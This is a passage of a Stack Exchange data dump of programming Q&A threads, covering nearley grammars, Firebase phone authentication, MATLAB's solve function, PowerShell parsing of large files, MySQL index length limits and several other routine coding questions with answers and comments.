@{@\"id\":@(2),@\"title\":@\"Child 1\",@\"subtitle\":@\"lalalala\",@\"description\":@\"something\",@\"parent\":parent};\nNSDictionary *child2 = @{@\"id\":@(3),@\"title\":@\"Child 2\",@\"subtitle\":@\"lelelele\",@\"description\":@\"something\",@\"parent\":child1};\n\n\/\/so now, you can do something like\nchild2[@\"parent\"][@\"id\"]; \/\/ 2\nchild2[@\"parent\"][@\"parent\"][@\"title\"]; \/\/ root\n<\/code>\nComment: Thanks. I used the NSPredicate method.\nAnswer: Since your JSON indicates that your NSArray contains NSDictionary objects, so here is what you can do:\n<code>NSPredicate *parentPredicate = [NSPredicate predicateWithBlock:^BOOL(id evaluatedObject, NSDictionary *bindings) {\n return evaluatedObject[@\"parent_id\"] == 1; \/\/set this id to different value to get children of different parent\n }];\n\nNSArray *childArray = [parentArray filteredArrayUsingPredicate:parentPredicate];\n<\/code>\nYou can set <code>parent_id<\/code> to another value to get child array of those <code>parent_id<\/code>s.\n","meta":{"source":"stackoverflow","title":"How to create a child array from a parrent array?","dup_signals":{}},"subset":"stackexchange"} +{"text":"understanding nearley with moo resulting datastructure\n\nQuestion: I have this grammar:\n<code>let lexer = moo.compile({ \n comment: { match: \/[\\\/\\\/.*?$|][^\\n]+\/, value: (s:string) => s.slice(1).trim() },\n newline: { match: \/[\\n]+\/, lineBreaks: true }\n});\n%}\n@lexer lexer\n\nmain ->\n element\n | main %newline element \nelement -> comment \n\ncomment -> %comment\n<\/code>\nNow when I feed nearley the following input: <code>\/\/\\n\/\/\\n\/\/\\n\/\/\\n\/\/<\/code> I get this result:\n<code>[\n [\n [\n [\n [\n [\n [\n [\n {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 0,\n \"lineBreaks\": 0,\n \"line\": 1,\n \"col\": 1\n }\n ]\n ]\n ],\n {\n \"type\": \"newline\",\n \"value\": \"\\n\",\n \"text\": \"\\n\",\n \"offset\": 2,\n \"lineBreaks\": 1,\n \"line\": 1,\n \"col\": 3\n },\n [\n [\n {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 3,\n \"lineBreaks\": 0,\n \"line\": 2,\n \"col\": 1\n }\n ]\n ]\n ],\n {\n \"type\": \"newline\",\n \"value\": \"\\n\",\n \"text\": \"\\n\",\n \"offset\": 5,\n \"lineBreaks\": 1,\n \"line\": 2,\n \"col\": 3\n },\n [\n [\n {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 6,\n \"lineBreaks\": 0,\n \"line\": 3,\n \"col\": 1\n }\n ]\n ]\n ],\n {\n \"type\": \"newline\",\n \"value\": \"\\n\",\n \"text\": \"\\n\",\n \"offset\": 8,\n \"lineBreaks\": 1,\n \"line\": 3,\n \"col\": 3\n },\n [\n [\n {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 9,\n \"lineBreaks\": 0,\n \"line\": 4,\n \"col\": 1\n }\n ]\n ]\n ],\n {\n \"type\": \"newline\",\n \"value\": \"\\n\",\n \"text\": \"\\n\",\n \"offset\": 11,\n \"lineBreaks\": 1,\n \"line\": 4,\n \"col\": 3\n },\n [\n [\n {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 12,\n \"lineBreaks\": 0,\n \"line\": 5,\n \"col\": 1\n }\n ]\n ]\n ]\n]\n<\/code>\nI dont quite understand why the resulting array is so deeply nested and if theres a way to just have it flat for each elements. Like comments on the same semantic level should be part of one array and not nested.\nAnswer: Okay, so it turns out you have to pass a post-processor to each rule if you don't want them nested in arrays.\nFor instance like this:\n<code>main ->\n element {% d => ({ type: \"main_element\", data: d[0]}) %}\n | main %newline element {% d => ({ type: \"main_element\", data: d[2], main_data: d[0]}) %}\n\nelement -> %comment\n{% d => ({ type: \"element\", data: d[0]}) %}\n<\/code>\nThis will result in a flat structure as expected:\n<code>[\n {\n \"type\": \"main_element\",\n \"data\": {\n \"type\": \"element\",\n \"data\": {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 12,\n \"lineBreaks\": 0,\n \"line\": 5,\n \"col\": 1\n }\n },\n \"main_data\": {\n \"type\": \"main_element\",\n \"data\": {\n \"type\": \"element\",\n \"data\": {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 9,\n \"lineBreaks\": 0,\n \"line\": 4,\n \"col\": 1\n }\n },\n \"main_data\": {\n \"type\": \"main_element\",\n \"data\": {\n \"type\": \"element\",\n \"data\": {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 6,\n \"lineBreaks\": 0,\n \"line\": 3,\n \"col\": 1\n }\n },\n \"main_data\": {\n \"type\": \"main_element\",\n \"data\": {\n \"type\": \"element\",\n \"data\": {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 3,\n \"lineBreaks\": 0,\n \"line\": 2,\n \"col\": 1\n }\n },\n \"main_data\": {\n \"type\": \"main_element\",\n \"data\": {\n \"type\": \"element\",\n \"data\": {\n \"type\": \"comment\",\n \"value\": \"\/\",\n \"text\": \"\/\/\",\n \"offset\": 0,\n \"lineBreaks\": 0,\n \"line\": 1,\n \"col\": 1\n }\n }\n }\n }\n }\n }\n }\n]\n<\/code>\nComment: You'd be better off using a repetition operator instead of recursion. At least, that's what [nearley's author recommends](https:\/\/nearley.js.org\/docs\/how-to-grammar-good#dont-roll-your-own-unroller).\nComment: Did you try `main -> (element %newline):*`?\nComment: I read that, but cannot get it working like the repetition operator. Do you have by chance an example? @rici\n","meta":{"source":"stackoverflow","title":"understanding nearley with moo resulting datastructure","dup_signals":{}},"subset":"stackexchange"} +{"text":"Which whiteboard\/canvas app with custom background and color options\n\nQuestion: I'm looking for a PC software whiteboard application that allows for custom RGB background colors and custom RGB pen colors. Most I've seen offer only a handful of color choices for the pen.\nLucidspark, an online app, for example, offers custom RGB pen colors, but does not allow the canvas color to be changed.\nThis is to be used for my lecture\/chalk-talk recordings for undergrad higher-ed math.\nI prefer something local to my computer, and as cheap as possible, of course. Besides custom color features I think only pen thickness options would be helpful.\nAnswer: The free version of myViewBoard works. It allows for custom background and pen colors. You can download it as a PC app or use it online as a web app.\n","meta":{"source":"matheducators.stackexchange","title":"Which whiteboard\/canvas app with custom background and color options","dup_signals":{}},"subset":"stackexchange"} +{"text":"Firebase phone auth react js\n\nQuestion: I am trying to implement firebase phone authentication in react js without using the firebase UI.\nHow do I do it?\ncode\n\n<code>requestVerificationCode = () => {\n const { phoneNumber } = this.state;\n const appVerifier = new firebase.auth.RecaptchaVerifier(\n \"recaptcha-container\"\n );\n if (phoneNumber < 10) {\n this.setState({ error: true });\n } else {\n this.setState({ message: \"Sending code ...\" });\n\n firebase\n .auth()\n .signInWithPhoneNumber(phoneNumber, appVerifier)\n .then(confirmResult =>\n this.setState({ confirmResult, verifying: true })\n )\n .catch(error =>\n this.setState({\n message: `Sign In With Phone Number Error: ${error.message}`\n })\n );\n }\n };<\/code>\n\nerror\n\nauth.esm.js:282\nUncaught K\u00a0{code: \"auth\/argument-error\", message: \"reCAPTCHA container is either not found or already contains inner elements!\"}\nComment: what have you tried so far?\nComment: You need to have an element with the ID of `recaptcha-container` in your html\nComment: what was the error?\nComment: Still not working @TheUnreal\nComment: I don't have enough reputation to comment, but I managed to get the above working by including e.preventDefault().\nAnswer: The important part is to wait for <code>componentDidMount()<\/code> or <code>mounted()<\/code> in Vue JS so that the dom element containing <code>\"recaptcha-container\"<\/code> is mounted.\nHTML\n<code><input id=\"recaptcha-container\" type=\"button\" onClick=\"this.onClick\" \/>\n<\/code>\nJS\n<code>componentDidMount () {\n window.recaptchaVerifier = new firebase.auth.RecaptchaVerifier(\"recaptcha-container\",\n {\n size:\"invisible\"\n \/\/ other options\n });\n}\n\nonClick() {\n const phoneNumber = this.phone;\n const appVerifier = window.recaptchaVerifier;\n firebase\n .auth()\n .signInWithPhoneNumber(phoneNumber, appVerifier)\n .then(confirmResult => {\n \/\/ success\n })\n .catch(error => {\n \/\/ error\n });\n}\n<\/code>\nIf you re-direct the user away from your component where <code>id=\"recaptcha-container\"<\/code> lives, then recaptcha will work fine but throw a style related error in the console, but that's because it's wants a permanent place on the page. \nAnswer: In React JS you will need to put this in index.html in public folder.\n<code><input id=\"recaptcha-container\" type=\"button\" onClick=\"this.onClick\" \/>\n\n<\/code>\nAlternatively, you can also create the html on dom.\n<code> const tag = document.createElement(\"input\");\n tag.id = \"recaptcha-container\"; \/\/ need to be same id as your firebase.auth.RecaptchaVerifier below\n tag.type=\"button\" \n tag.onClick=\"this.onClick\"\n document.body.appendChild(tag);\n<\/code>\nthen\n<code>window.recaptchaVerifier = new firebase.auth.RecaptchaVerifier(\"recaptcha-container\", {\n size: \"invisible\",\n callback: (response) => {\n \/\/ reCAPTCHA solved, allow signInWithPhoneNumber.\n console.log(\"Submitted window.recaptchaVerifier: \", response);\n\n },\n \"expired-callback\": (e) => {\n console.log(\"Expired Callback: \", e);\n \/\/ Response expired. Ask user to solve reCAPTCHA again.\n \/\/ ...\n },\n });\n<\/code>\n","meta":{"source":"stackoverflow","title":"Firebase phone auth react js","dup_signals":{}},"subset":"stackexchange"} +{"text":"order of the outputs for the MATLAB solve function\n\nQuestion: I have been tinkering with the MATLAB solve function for a while, but cannot seem how it determines the order that it outputs the symbolic variables. \nSpecifically, I have a system of equations that I want to solve simultaneously.\n<code>a = f(a, b, c, d)\nb = f(a, b, c, d)\nc = f(a, b, c, d)\nd = f(a, b, c, d)\n<\/code>\nand these equations are symbolic and have other symbolic variables (aside from a, b, c, and d). (so the solution outputs aren't numeric, but are symbolic). \nFor example, when I am solving the for the equations of motion for an inverted spring pendulum, I have two equations that are both dependent on phiDDot and lenDDot. I use the solve function to solve for phiDDot and lenDDot separately using this call:\n<code>[eom2, eom1] = solve(Lag(1)==0, Lag(2)==0, ddphi, ddlen);\n<\/code>\nThe solution for ddphi corresponds to the second term of the matrix outputted, while ddlen corresponds to the first term of the matrix. I was wondering whether there was some way to tell MATLAB to output ddphi first and ddlen second, or at least determine what order they are outputted. Not knowing the order of the variables becomes a big problem when I am solving for more than 4 variables, and trying to solve the differential equations using ode45. \nAny advice would be helpful!!\nAnswer: I believe that it's alphabetical based on the ASCII values of the variable names in your equations. As per the documentation for <code>solve<\/code>, <code>sym\/symvar<\/code> is used to parse the equations in the case where you don't supply the names of output variables. The help for <code>sym\/symvar<\/code> indicates that it returns variables in lexicographical order, i.e. alphabetical (<code>symvar<\/code> does the same, even though it doesn't say so, by making calls to <code>setdiff<\/code>). If you look at the actual code for solve.m (type <code>edit solve<\/code> in your command window) and examine the sub-function called <code>assignOutputs<\/code> (line 190 in R2012b) you'll see that it makes a call to <code>sort<\/code> and that there's a comment about lexicographical order.\nIn R2012b (and likely earlier) the documentation differs from that of R2013a in a way that seems relevant to your issue. In R2013a, this sentence is added:\n\nIf you explicitly specify independent variables <code>vars<\/code>, then the solver uses the same order\n to return the solutions.\n\nI'm still running R2012b, so I can't confirm this different behavior.\n","meta":{"source":"stackoverflow","title":"order of the outputs for the MATLAB solve function","dup_signals":{}},"subset":"stackexchange"} +{"text":"Fill section of contour with solid color\n\nQuestion: I have a contour plot with some z values equal to zero. I want to shade all these values a particular color, from this\n\nto this (MS Paint mock-up).\n\nHow can I go about doing so? Is there some feature in the library that will allow me to do this?\nComment: You would draw a filled contour (=`contourf`) plot of the contour you like to shade. Note that this question does not comply to [ask]. You should clearly state what problem you have and in how far other resources are not helping. If you have a problem with implementing anything using `contourf` you need to show the [mcve] of the code that fails in doing so.\nComment: @ImportanceOfBeingErnest Yes, that is exactly what I was looking for. I did a `contourf` for the gray fill followed by a `contour` for the contour lines. The only problem is that the gray fill overlaps some of the lines. Is there a way to fix this? I want to draw the contour lines over the gray fill.\nComment: I have no way of knowing what you did and how the resulting plot looks like. I can only give you advice on reproducible code, again, see [mcve].\nAnswer: Have a look at the <code>matplotlib<\/code> contourplot and colormap demos. From the contour plot demo's last example, you can specify a colour map for the contour plot as follows\n<code>plt.figure()\n# plots a bunch of colours\nim = plt.imshow(Z, interpolation='bilinear', origin='lower',\n cmap=cm.gray, extent=(-3, 3, -2, 2))\n\n# plot the contour lines \nlevels = np.arange(-1.2, 1.6, 0.2)\nCS = plt.contour(Z, levels,\n origin='lower',\n linewidths=2,\n extent=(-3, 3, -2, 2))\n<\/code>\nyou'll need to define your own color map if you want to leave some regions white\/unfilled. The colormap is just a <code>dict<\/code> that maps numeric values to colours\nhttps:\/\/matplotlib.org\/examples\/pylab_examples\/contour_demo.html\nhttps:\/\/matplotlib.org\/examples\/pylab_examples\/custom_cmap.html\nComment: No, `imshow` does not seem to be well suited here. As commented above, using `contourf` would be the way to go.\n","meta":{"source":"stackoverflow","title":"Fill section of contour with solid color","dup_signals":{}},"subset":"stackexchange"} +{"text":"pl\/sql: stored procedure table or view does not exist\n\nQuestion: I have two tables CUSTOMER and ORDER from the same tablespace.\nIf I do <code>select * from CUTOMER.date a left join ORDER.date b on a.id = b.id<\/code>, it will work fine.\nIf I create a stored procedure like:\n<code>CREATE OR REPLACE PROCEDURE aProc(prc OUT Sys_Refcursor)\nAS\nBEGIN\nOPEN prc for select * from CUTOMER.date a left join ORDER.date b on a.id = b.id;\nEND aProc;\n<\/code>\nIt will cause error: \n\nTable or view does not exist.\n\nIf I change the procedure name aProc to CUSTOMER.aProc, only ORDER will cause the table does not exist error.\nI also tried AUTHID CURRENT_USER, which doesn't work.\nIs there any way I can get both tables?\nComment: Can you post the exact query rather a mocked one.\nComment: on which schema is the procedure been created?\nAnswer: I've solved the problem by adjusting the levels of packages, thank you for your attention anyways\n","meta":{"source":"stackoverflow","title":"pl\/sql: stored procedure table or view does not exist","dup_signals":{}},"subset":"stackexchange"} +{"text":"The provider is spring data rest ,client is use feign with page not work\n\nQuestion: my boot is 2.0.5\nI have tried include \n<code>compile('org.springframework.boot:spring-boot-starter-hateoas')\n<\/code>\nand feign code:\n<code>@GetMapping\nPagedResources<Subject> findAll();\n<\/code>\nand replace PagedResources to Resources ,don't work.\nand I also want to know the client controller how set the page param. can elegance to pass the controller param to feign then to the data-rest provider.\nComment: I don't really understand your question. What Exactly does not work? If possible, provide git project to test this.\nAnswer: Spring Data elements such as <code>Pageable<\/code> are not supported by Spring Cloud OpenFeign. See Support Spring Data Pageable in Feign Client.\n","meta":{"source":"stackoverflow","title":"The provider is spring data rest ,client is use feign with page not work","dup_signals":{}},"subset":"stackexchange"} +{"text":"Undefined Reference when using a C++ library function\n\nQuestion: Using Code::Blocks and the GNU GCC compiler, I went along and made my own library:\n<code>\/\/main.cpp (Library)\nint SampleAddInt(int i1, int i2)\n{\n return i1 + i2;\n}\n<\/code>\nCompiled it to a .a file. I then made a separate project to test the library function with. Made sure I linked it correctly in the Build Options. Here's my code using it in my project:\n<code>\/\/main.cpp (Test Project)\n#include <iostream>\n\nusing namespace std;\n\n\/\/Declaration of function from library\nint SampleAddInt(int i1, int i2);\n\nint main(){\n int x = SampleAddInt(2, 4);\n cout << x << \"test\" << endl;\n}\n<\/code>\nGot this error when trying to compile my Test Project:\n\nmain.cpp|9|undefined reference to `SampleAddInt(int, int)'|\n\nFor some reason it can't seem to find this function. I then wrapped extern \"C\" { ... } around the declaration in my Test Project main.cpp source and it built correctly.\nWhy, when my library was compiled from a main.cpp source, do I need to use extern \"C\" for my library to work with my Test Project? And why when I don't use extern \"C\", does the compiler tell me that the function is an undefined reference?\nComment: Did you accidentally compile the library file using `gcc` instead of `g++` maybe?\nComment: I used the Code::Blocks IDE. When I was setting up the IDE it asked me which compiler to use and I chose the GNU GCC compiler. Is this not correct? I recall reading that the GNU GCC compiler and compile both C and C++. It's the only one that's detected on my system.\nComment: It's the same compiler, correct, but you have to be sure to compile c++ files in c++ mode. Usually this is the default if `g++` is used. You should see the commandline command that are used in the console window of codeblocks.\nComment: Ah you're right, it's using mingw32-gcc.exe. How do I switch this so .cpp files will automatically get compiled using mingw32-g++.exe ?\nComment: In toolchain executables tab in my global compiler settings, it shows that the C++ compiler is set to mingw32-g++.exe. Why is this using gcc still?\nComment: It's maybe a problem with your [project settings](http:\/\/www.codeblocks.org\/docs\/main_codeblocks_en.html). Sorry I don't have the time right now to research that further for you.\nAnswer: Got it working.\nThe problem was it had to do with Code::Blocks.\nIt was using the gcc compiler instead of g++ so I was forced to use extern \"C\" if I wanted to run any of my library code.\nTo fix this I right clicked main.cpp, clicked Properties, and changed the variable from \"CC\" to \"CPP\" and it now compiles with g++.\n","meta":{"source":"stackoverflow","title":"Undefined Reference when using a C++ library function","dup_signals":{}},"subset":"stackexchange"} +{"text":"NDSolve for PDE with discontinuous initial\/terminal condition\n\nQuestion: I have an issue with NDSolve for the case of a PDE with discontinuous initial\/terminal condition. Consider the PDE solution\n<code>Z=z\/.First[NDSolve[{\n D[z[t,x],t] == z[t,x] D[z[t,x],x]-1\/2 (1-t)^2 D[z[t,x],{x,2}],\n z[1,x]==UnitStep[x],\n z[t,-5000]==0,\n z[t,5000]==1},\n {z},{t,0,1},{x,-5000,5000}]]\n<\/code>\nThe terminal condition is the discontinuous UnitStep function. When I plot the solution for t=1 now,\n<code>Plot[Z[1, x], {x, -10, 10}]\n<\/code>\n\nMathematica has obviously smoothened the terminal condition (which was explicitly given by the UnitStep function).\nIs it possible to disable this smoothing? Or at least, I want to have a smooth function that does not exceed 1 and does not go below 0.\nNote: What I am not searching for is a solution like \"increase the MaxSteps\" or something similar. I am interested in options on how Mathematica processes the initial\/terminal condition.\nThanks a lot for your help!!\nAnswer: For the given grid resolution, you're probably going to have to smooth the <code>UnitStep<\/code> function with a width equal to that grid spacing (at least). Here is one way to do that, using the Fermi function instead of <code>UnitStep<\/code>:\n<code>f[x_, d_] := 1\/(E^(-(x\/d)) + 1)\nZ = z \/. First[\n With[{d = 5000.\/10000}, \n NDSolve[{D[z[t, x], t] == \n z[t, x]*D[z[t, x], x] - 1\/2*(1 - t)^2*D[D[z[t, x], x], x], \n z[1, x] == f[x, d], z[t, -5000] == f[-5000, d], \n z[t, 5000] == f[5000, d]}, {z}, {t, 0, 1}, {x, -5000, 5000}]]]\n\nPlot[Z[1, x], {x, -10, 10}]\n<\/code>\n\nHere, the parameter <code>d<\/code> is the smoothing of the vertical step.\nComment: Thanks for your quick reply. Smoothing the function in advance looks like a good workaround to me. However, I would like to know what kind of smoothing procedure Mathematica uses internally and if I can modify or disable it.\nComment: @Posch79 Could just be numerical instability of whatever solution method is used, try tweaking the `Method` argument and see if\/how it changes\nComment: In general, though, I don't know the answer to how the interpolation can be influenced. No matter what you do, the grid limits how fast your spatial variations can be. And `UnitStep` will *always* be too steep. But one can probably construct a more customized solution using `NDSolve\\`ProcessEquations`.\n","meta":{"source":"mathematica.stackexchange","title":"NDSolve for PDE with discontinuous initial\/terminal condition","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I make this PowerShell script parse large files faster?\n\nQuestion: I have the following PowerShell script that will parse some very large file for ETL purposes. For starters my test file is ~ 30\u00a0MB. Larger files around 200\u00a0MB are expected. So I have a few questions.\nThe script below works, but it takes a very long time to process even a 30\u00a0MB file.\nPowerShell Script:\n<code>$path = \"E:\\Documents\\Projects\\ESPS\\Dev\\DataFiles\\DimProductionOrderOperation\"\n$infile = \"14SEP11_ProdOrderOperations.txt\"\n$outfile = \"PROCESSED_14SEP11_ProdOrderOperations.txt\"\n$array = @()\n\n$content = gc $path\\$infile |\n select -skip 4 |\n where {$_ -match \"[|].*[|].*\"} |\n foreach {$_ -replace \"^[|]\",\"\" -replace \"[|]$\",\"\"}\n\n$header = $content[0]\n\n$array = $content[0]\nfor ($i = 1; $i -le $content.length; $i+=1) {\n if ($array[$i] -ne $content[0]) {$array += $content[$i]}\n}\n\n$array | out-file $path\\$outfile -encoding ASCII\n<\/code>\nDataFile Excerpt:\n<code>---------------------------\n|Data statistics|Number of|\n|-------------------------|\n|Records passed | 93,118|\n---------------------------\n02\/14\/2012 Production Operations and Confirmations 2\n-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\nProduction Operations and Confirmations\n-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n|ProductionOrderNumber|MaterialNumber |ModifiedDate|Plant|OperationRoutingNumber|WorkCenter|OperationStatus|IsActive| WbsElement|SequenceNumber|OperationNumber|OperationDescription |OperationQty|ConfirmedYieldQty|StandardValueLabor|ActualDirectLaborHrs|ActualContractorLaborHrs|ActualOvertimeLaborHrs|ConfirmationNumber|\n|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n|180849518 |011255486L1 |02\/08\/2012 |2101 | 9901123118|56B30 |I9902 | |SOC10MA2302SOCJ31| |0140 |Operation 1 | 1 | 0 | 0.0 | | 499.990 | | 9908651250|\n|180849518 |011255486L1 |02\/08\/2012 |2101 | 9901123118|56B30 |I9902 | |SOC10MA2302SOCJ31|14 |9916 |Operation 2 | 1 | 0 | 499.0 | | | | 9908532289|\n|181993564 |011255486L1 |02\/09\/2012 |2101 | 9901288820|56B30 |I9902 | |SOC10MD2302SOCJ31|14 |9916 |Operation 1 | 1 | 0 | 499.0 | | 399.599 | | 9908498544|\n|180885825 |011255486L1 |02\/08\/2012 |2101 | 9901162239|56B30 |I9902 | |SOC10MG2302SOCJ31| |0150 |Operation 3 | 1 | 0 | 0.0 | | 882.499 | | 9908099659|\n|180885825 |011255486L1 |02\/08\/2012 |2101 | 9901162239|56B30 |I9902 | |SOC10MG2302SOCJ31|14 |9916 |Operation 4 | 1 | 0 | 544.0 | | | | 9908858514|\n|181638583 |990104460I0 |02\/10\/2012 |2101 | 9902123289|56G99 |I9902 | |SOC11MAR105SOCJ31| |0160 |Operation 5 | 1 | 0 | 1,160.0 | | | | 9914295010|\n|181681218 |990104460B0 |02\/08\/2012 |2101 | 9902180981|56G99 |I9902 | |SOC11MAR328SOCJ31|0 |9910 |Operation 6 | 1 | 0 | 916.0 | | | | 9914621885|\n|181681036 |990104460I0 |02\/09\/2012 |2101 | 9902180289|56G99 |I9902 | |SOC11MAR108SOCJ31| |0180 |Operation 8 | 1 | 0 | 1.0 | | | | 9914619196|\n|189938054 |011255486A2 |02\/10\/2012 |2101 | 9999206805|5AD99 |I9902 | |RS08MJ2305SOCJ31 | |0599 |Operation 8 | 1 | 0 | 0.0 | | | | 9901316289|\n|181919894 |012984532A3 |02\/10\/2012 |2101 | 9902511433|A199399Z |I9902 | |SOC12MCB101SOCJ31|0 |9935 |Operation 9 | 1 | 0 | 0.5 | | | | 9916914233|\n|181919894 |012984532A3 |02\/10\/2012 |2101 | 9902511433|A199399Z |I9902 | |SOC12MCB101SOCJ31|22 |9951 |Operation 10 | 1 | 0 | 68.080 | | | | 9916914224|\n<\/code>\nComment: A search for \"Get-Content large files\" was very helpful. See http:\/\/rkeithhill.wordpress.com\/2007\/06\/17\/optimizing-performance-of-get-content-for-large-files\/.\nAnswer: Your script reads one line at a time (slow!) and stores almost the entire file in memory (big!).\nTry this (not tested extensively):\n<code>$path = \"E:\\Documents\\Projects\\ESPS\\Dev\\DataFiles\\DimProductionOrderOperation\"\n$infile = \"14SEP11_ProdOrderOperations.txt\"\n$outfile = \"PROCESSED_14SEP11_ProdOrderOperations.txt\"\n\n$batch = 1000\n\n[regex]$match_regex = '^\\|.+\\|.+\\|.+'\n[regex]$replace_regex = '^\\|(.+)\\|$'\n\n$header_line = (Select-String -Path $path\\$infile -Pattern $match_regex -list).line\n\n[regex]$header_regex = [regex]::escape($header_line)\n\n$header_line.trim('|') | Set-Content $path\\$outfile\n\nGet-Content $path\\$infile -ReadCount $batch |\n ForEach {\n $_ -match $match_regex -NotMatch $header_regex -Replace $replace_regex ,'$1' | Out-File $path\\$outfile -Append\n }\n<\/code>\nThat's a compromise between memory usage and speed. The <code>-match<\/code> and <code>-replace<\/code> operators will work on an array, so you can filter and replace an entire array at once without having to foreach through every record. The <code>-readcount<\/code> will cause the file to be read in chunks of $batch records, so you're basically reading in 1000 records at a time, doing the match and replace on that batch then appending the result to your output file. Then it goes back for the next 1000 records. Increasing the size of $batch should speed it up, but it will make it use more memory. Adjust that to suit your resources.\nComment: @jmolinor -- your version of the query made a HUGE difference. From 10 mins to 18 seconds. Amazing. The solution to the nul character problem can be found here: http:\/\/stackoverflow.com\/questions\/3806305\/powershell-2-0-generates-nulls-between-characters, but basically the issue is with the default encoding for powershell. The solution was to also include -encoding ASCII next to the -Append.\nComment: Thanks. I looked at it again, and did a little tuning. Not sure how much that will help the performance, but if I'm reading the docs right, compiled regexes are faster, and casting the variable as [regex] causes them to be compiled.\nComment: This is good, but I also need to compare every element of the array with the first element (header) and remove it if there is a match - because it is repeated throughout the file. This seems to be where things really bog down in the script. With your approach how do I do this without assigning gC to a variable?\nComment: Do you need to include one copy of the header at the beginning of the output file?\nComment: I updated the script. It should grab the header line from the file, trim off the leading and trailing |, and start a new $outfile using that for the header before the loop starts. Using [regex]::escape, it creates a new regex that does a literal match to the header line, and then a -notmatch on that added to the -match -replace chain should drop those out inside the loop.\nComment: @mjolinor, this works in pieces -- the header piece by itself and the body piece by itself (without the -Append), but when you run it all together then nul characters or spaces are inserted between every character in the file (within the body piece). Something to do with how the \"-append\" works?\nComment: @mjolinor: casting to [regex] doesn't compile the regex, but it does construct the Regex object once. It's difficult to speculate about performance, but in this scenario the disk IO is likely to dominate. Therefore, I suspect any casting vs. not casting vs. compiling the regex to have no noticeable effect.\nComment: Would you have to explicitly set the regex option to make it a compiled regex?\nAnswer: The <code>Get-Content<\/code> cmdlet does not perform as well as a StreamReader when dealing with very large files. You can read a file line by line using a StreamReader like this:\n<code>$path = 'C:\\A-Very-Large-File.txt'\n$r = [IO.File]::OpenText($path)\nwhile ($r.Peek() -ge 0) {\n $line = $r.ReadLine()\n # Process $line here...\n}\n$r.Dispose()\n<\/code>\nSome performance comparisons:\n<code>Measure-Command {Get-Content .\\512MB.txt > $null}\n<\/code>\nTotal Seconds: 49.4742533\n<code>Measure-Command {\n $r = [IO.File]::OpenText('512MB.txt')\n while ($r.Peek() -ge 0) {\n $r.ReadLine() > $null\n }\n $r.Dispose()\n}\n<\/code>\nTotal Seconds: 27.666803\nComment: `Get-Content` does **not** load the whole file in to memory, but assigning the result to a variable does. This is an important design principle in PowerShell - streaming through a pipeline can be memory efficient even for very large data sets.\nComment: If the comparison is choking, I wonder if the PC is having to page in\/out data as it checks the element x against element 0 because it can't fit the whole array of string in memory -- if so, $content[0] may not be a constant-time operation even though on a small dataset it could be assumed to be. Maybe try copying the contents of $content[0] into a new variable and compare against that instead of the array element.\nComment: That is a great suggestion. I should also point out that the get-content part of the script works pretty quickly; its that part where I loop through everything in the array comparing every element to the first element in the array that seems to make it run extremeley slow.\nComment: @JayBazuzi Fair point. Typically a variable is assigned to the output of Get-Content. I updated my answer based on your input. Thanks.\nComment: @daniel richnak, thanks for that comment - I hadn't considered that regarding the element 0.\nAnswer: This is almost a non-answer...I love PowerShell...but I will not use it to parse log files, especially large log files. Use Microsoft's Log Parser. \n<code>C:\\>type input.txt | logparser \"select substr(field1,1) from STDIN\" -i:TSV -nskiplines:14 -headerrow:off -iseparator:spaces -o:tsv -headers:off -stats:off\n<\/code>\nComment: This is a good non-answer. Powershell can be painfully slow with huge files. Coming from a linux background you expect to pipe stuff through grep fairly efficiently, but Get-Content and Select-String just don't compete. I love PowerShell too, but not when parsing and filtering massive log files.\nComment: As of 2023, this is not true anymore. you can use something like Get-Content input.txt -Buffer 1000 | ConvertFrom-CSV . The real difference is buffering the pipeline, remember powershell works on objects (not bytes), imagine calling a function for every line of a text file, now compare it with passing an array with 1000 lines.\n","meta":{"source":"stackoverflow","title":"How can I make this PowerShell script parse large files faster?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Primary key cannot hold more than 767 or 1000 character as primary key\n\nQuestion: I'm trying to create a table which one of their columns will hold characters more than 5000 characters and I don't want any row for this column to be repeated so I used a primary key to make every row in this column not save again when it's already exist\nBut the problem is when I'm trying to create this column with <code>column_name VARCHAR(5500) Primary key<\/code> it's giving me this error\n<code>Specified key was too long; max key length is 767 bytes<\/code>\nI searched a lot and found that <code>InnoDB<\/code> engine accepts only 767 characters as max length and in <code>MYISAM<\/code> engine accepts 1000 character but this doesn't help me because this column maybe hold more than 5000 character\nWhat I'm looking for is a way to create a column which no one of its rows can be repeated and accepts many characters\n<code>CREATE TABLE data_table (\n date_time VARCHAR(100),\n message VARCHAR(5500) PRIMARY KEY\n) ENGINE = MYISAM CHARACTER SET latin1\n<\/code>\nComment: Seems pointless you would just have to change 1 character for it not to be seen as a duplicate.\nComment: can you give me any suggestion for more effective solution ?\nComment: Run a `select` first? You can't index 5000 chars.\nComment: I found that `Memory` Engine can hold 3072 character as max length maybe it's can work although that i was hope to found engine who can hold more that this or if there's no limitations \nComment: Another thread suggested storing a hash. You'd just need to worry about hash collision in that scenario. If the odds of that are acceptable for your app could do that.\nComment: Change latin1 to utf8mb4\nComment: Please share more details. Why do you need to use a primary key on a message?\nComment: @Dharman changing to utf8mb4 cuts the limit to 767\/4 or 1000\/4 _characters_. The index limit is \"bytes\"; the number in VARCHAR is \"characters\".\nAnswer: You have hit a fundamental limitation. Sadly, no amount of negotiation or hacking will find you a way to make an index as long as you need. Therefore, a unique index is not a solution to your problem of preventing duplicate text strings.\nMany people store a hash of long text fields along with the text.\nSHA-256 is a decent 